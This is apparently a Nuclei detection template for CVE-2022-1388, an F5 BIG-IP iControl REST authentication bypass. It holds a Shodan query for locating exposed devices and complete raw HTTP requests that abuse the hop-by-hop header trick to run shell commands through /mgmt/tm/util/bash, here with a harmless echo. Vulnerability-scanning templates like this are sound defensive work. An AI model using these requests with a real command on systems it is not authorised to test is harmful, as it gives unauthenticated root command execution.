id: CVE-2022-1388 info: name: F5 BIG-IP iControl - REST Auth Bypass RCE author: dwisiswant0,Ph33r severity: critical description: | This F5 BIG-IP vulnerability can allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. reference: - https://twitter.com/GossiTheDog/status/1523566937414193153 - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/ - https://support.f5.com/csp/article/K23605346 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1388 cwe-id: CWE-306 metadata: shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" verified: "true" tags: f5,bigip,cve,cve2022,rce,mirai variables: auth: "admin:" cmd: "echo CVE-2022-1388 | rev" requests: - raw: - | POST /mgmt/tm/util/bash HTTP/1.1 Host: {{Hostname}} Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a Authorization: Basic {{base64(auth)}} Content-Type: application/json { "command": "run", "utilCmdArgs": "-c '{{cmd}}'" } - | POST /mgmt/tm/util/bash HTTP/1.1 Host: localhost Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a Authorization: Basic {{base64(auth)}} Content-Type: application/json { "command": "run", "utilCmdArgs": "-c '{{cmd}}'" } stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "commandResult" - "8831-2202-EVC" condition: and